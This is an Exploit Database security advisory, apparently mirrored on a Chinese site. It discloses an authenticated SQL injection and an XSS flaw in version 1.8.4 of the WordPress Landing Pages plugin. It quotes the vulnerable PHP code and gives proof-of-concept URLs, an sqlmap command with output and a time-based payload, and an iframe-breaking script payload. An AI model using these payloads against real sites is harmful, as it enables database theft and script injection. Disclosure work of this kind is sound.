WordPress Plugin Landing Pages 1.8.4 – Multiple Vulnerabilities

• Exploit Database
• 115 阅读

• 作者： Adrián M. F.
  日期： 2015-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37108/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69

  # Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages" # Author: Adrián M. F. - adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/landing-pages/ # Active installs: 20,000+ # Vulnerable version: 1.8.4 # Fixed version: 1.8.5 # CVE: CVE-2015-4064, CVE-2015-4065   Vulnerabilities (2) =====================   (1) Authenticated SQLi [CWE-89] (CVE-2015-4064) -----------------------------------------------   * CODE: modules/module.ab-testing.php:100 +++++++++++++++++++++++++++++++++++++++++ $wpdb->query(" SELECT <code>meta_key</code>, <code>meta_value FROM $wpdb->postmeta WHERE <code>post_id</code> = ".$_GET[&apos;post&apos;]." "); +++++++++++++++++++++++++++++++++++++++++   * POC: http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation   SQLMap +++++++++++++++++++++++++++++++++++++++++ ./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post [............] GET parameter &apos;post&apos; is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 86 HTTP(s) requests: --- Parameter: post (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation --- [13:35:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 7.0 (wheezy) web application technology: Apache 2.2.22, PHP 5.4.39 back-end DBMS: MySQL 5.0.12 +++++++++++++++++++++++++++++++++++++++++     (2) Authenticated XSS [CWE-79] (CVE-2015-4065) ----------------------------------------------   * CODE: shared/shortcodes/inbound-shortcodes.php:761 +++++++++++++++++++++++++++++++++++++++++ <iframe src=&apos;https://www.exploit-db.com/exploits/37108/<?php echo INBOUDNOW_SHARED_URLPATH . &apos;shortcodes/&apos;; ?>preview.php?sc=&post=<?php echo $_GET[&apos;post&apos;]; ?>&apos; width="285" scrollbar=&apos;true&apos; frameborder="0" id="inbound-shortcodes-preview"></iframe> +++++++++++++++++++++++++++++++++++++++++     * POC: http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post=&apos;></iframe><script>alert(String.fromCharCode(88, 83, 83))</script>     Timeline ========== 2015-05-09: Discovered vulnerability. 2015-05-20: Vendor notification. 2015-05-20: Vendor response. 2015-05-22: Vendor fix. 2015-05-25: Public disclosure.